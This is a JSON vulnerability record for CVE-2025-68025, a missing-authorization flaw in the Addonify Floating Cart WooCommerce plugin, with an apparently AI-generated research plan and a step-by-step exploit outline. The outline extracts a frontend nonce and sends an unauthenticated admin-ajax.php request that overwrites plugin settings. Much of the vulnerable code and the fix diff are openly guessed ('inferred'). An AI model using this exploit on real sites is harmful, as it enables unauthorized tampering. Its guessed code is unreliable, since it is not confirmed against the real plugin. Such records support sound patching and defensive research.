[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1_pJyGDMt2mhYiI9CvSMoTsmzit8hLx3HiHguRK74wE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68025","addonify-floating-cart-for-woocommerce-missing-authorization","Addonify Floating Cart For WooCommerce \u003C= 1.2.17 - Missing Authorization","The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.17. This makes it possible for unauthenticated attackers to perform an unauthorized action.","addonify-floating-cart",null,"\u003C=1.2.17","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-05 00:00:00","2026-02-09 20:58:21",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4661566b-0729-4489-9a47-8e3e0ac73573?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to identify and exploit CVE-2025-68025, a Missing Authorization vulnerability in the **Addonify Floating Cart For WooCommerce** plugin.\n\n### 1. Vulnerability Summary\nThe vulnerability exists because a specific AJAX handler or REST API endpoint in the `addonify-floating-cart` plugin fails to implement a capability check (e.g., `current_user_can( 'manage_options' )`). While the handler might implement a nonce check for CSRF protection, the nonce is often exposed to unauthenticated users on the frontend, allowing them to bypass the missing authorization check and perform actions intended only for administrators (such as modifying plugin settings or performing sensitive data operations).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (or potentially a REST route under `\u002Fwp-json\u002Faddonify-floating-cart\u002Fv1\u002F`).\n*   **Vulnerable Action:** Likely `addonify_fc_save_settings`, `afc_save_settings`, or `addonify_floating_cart_update_option` (inferred).\n*   **Parameter:** Typically a `settings` array or individual option keys passed via POST.\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** The plugin must be active. A valid nonce must be obtained if the handler calls `check_ajax_referer`.\n\n### 3. Code Flow Trace\n1.  **Entry Point:** The plugin registers an AJAX action for both authenticated and unauthenticated users:\n    ```php\n    \u002F\u002F Inferred registration in a class constructor or init hook\n    add_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n    add_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n    ```\n2.  **Vulnerable Function:** The `save_settings` function (or similar) is called.\n3.  **Missing Check:**\n    ```php\n    public function save_settings() {\n        \u002F\u002F May contain: check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n        \u002F\u002F MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n        \n        $settings = $_POST['settings'];\n        update_option( 'addonify_floating_cart_settings', $settings );\n        wp_send_json_success();\n    }\n    ```\n4.  **Sink:** The `update_option` function writes user-controlled data to the WordPress database.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its frontend \"Floating Cart\" functionality.\n\n1.  **Identify Shortcode\u002FTrigger:** Check for `add_shortcode` or if the cart loads globally. The floating cart usually enqueues scripts on all frontend pages where WooCommerce is active.\n2.  **Navigation:** Use `browser_navigate` to go to the site's homepage.\n3.  **Extraction:** Based on common Addonify patterns, the nonce is likely stored in a global JS object.\n    *   **Inferred JS Variable:** `addonify_floating_cart_params` or `afc_vars`.\n    *   **Inferred Key:** `ajax_nonce` or `nonce`.\n4.  **Execution:**\n    ```javascript\n    \u002F\u002F Use browser_eval to find the nonce\n    browser_eval(\"window.addonify_floating_cart_params?.ajax_nonce || window.afc_vars?.nonce\")\n    ```\n\n### 5. Test Data Setup\n1.  Ensure WooCommerce and Addonify Floating Cart are installed and active.\n2.  Ensure a product exists so the cart functionality is triggered.\n3.  Create a public page to ensure the script (and nonce) is rendered:\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Cart Test\" --post_content='[woocommerce_cart]'\n    ```\n\n### 6. Exploitation Strategy\nWe will attempt to change the plugin's configuration, specifically targeting a setting that would be visible in the admin UI or frontend (e.g., the cart title).\n\n1.  **Capture Nonce:** Use `browser_navigate` and `browser_eval` as described in Section 4.\n2.  **Prepare Payload:** Define a new value for a plugin setting.\n    *   **Action:** `addonify_floating_cart_save_settings` (inferred - must verify by grepping `wp_ajax_nopriv` in the source).\n    *   **Target Option:** `addonify_floating_cart_settings`.\n3.  **HTTP Request (Playwright):**\n    ```json\n    {\n      \"method\": \"POST\",\n      \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      \"headers\": {\n        \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n      },\n      \"params\": {\n        \"action\": \"addonify_floating_cart_save_settings\",\n        \"nonce\": \"EXTRACTED_NONCE\",\n        \"settings[cart_title]\": \"Hacked by PoC\",\n        \"settings[enable_floating_cart]\": \"1\"\n      }\n    }\n    ```\n\n### 7. Expected Results\n*   The server should return a `200 OK` status with a JSON response: `{\"success\":true}`.\n*   The `addonify_floating_cart_settings` option in the database should be updated.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the change using WP-CLI:\n```bash\n# Check the option value\nwp option get addonify_floating_cart_settings --format=json\n```\nVerify that `cart_title` matches \"Hacked by PoC\".\n\n### 9. Alternative Approaches\nIf the `save_settings` action name is different:\n1.  **Grep Search:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n2.  **Analyze Script Localization:**\n    Search for `wp_localize_script` to find the exact JS object name:\n    ```bash\n    grep -rn \"wp_localize_script\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n3.  **REST API Check:**\n    If no AJAX actions are found, search for REST route registrations:\n    ```bash\n    grep -rn \"register_rest_route\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n    Look for routes where `'permission_callback' => '__return_true'` or no callback is defined.","The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Unauthenticated attackers can exploit this to change plugin settings, provided they can retrieve a nonce which is typically exposed on the frontend for legitimate cart operations.","\u002F\u002F Inferred registration in the main plugin class or admin handler\nadd_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\nadd_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n\n---\n\n\u002F\u002F Inferred vulnerable handler lacking capability checks\npublic function save_settings() {\n    \u002F\u002F A nonce check might exist, but it is insufficient for authorization\n    check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n    \n    \u002F\u002F MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n    \n    if ( isset( $_POST['settings'] ) ) {\n        $settings = $_POST['settings'];\n        update_option( 'addonify_floating_cart_settings', $settings );\n        wp_send_json_success();\n    }\n}","--- a\u002Fincludes\u002Fclass-addonify-floating-cart-admin.php\n+++ b\u002Fincludes\u002Fclass-addonify-floating-cart-admin.php\n@@ -120,6 +120,10 @@\n public function save_settings() {\n     check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n \n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => __( 'Unauthorized', 'addonify-floating-cart' ) ), 403 );\n+    }\n+\n     if ( isset( $_POST['settings'] ) ) {\n         $settings = array_map( 'sanitize_text_field', $_POST['settings'] );\n         update_option( 'addonify_floating_cart_settings', $settings );","1. Extract Nonce: Navigate to the site's homepage or any product page where the floating cart is active. Inspect the HTML source or use a JavaScript console to extract the 'nonce' value from the localized script object (likely window.addonify_floating_cart_params.ajax_nonce).\n2. Identify Target Parameters: Identify the plugin settings structure, typically an array passed via the 'settings' key in POST data.\n3. Send Unauthorized Request: Perform an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following parameters:\n   - action: addonify_floating_cart_save_settings\n   - nonce: [Extracted Nonce]\n   - settings[cart_title]: Your Malicious Title\n   - settings[enable_floating_cart]: 1\n4. Verify Change: Access the plugin's settings page in the WordPress dashboard as an administrator or view the frontend to confirm the settings have been updated to the malicious values.","gemini-3-flash-preview","2026-04-21 04:21:59","2026-04-21 04:22:21",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-floating-cart\u002Ftags"]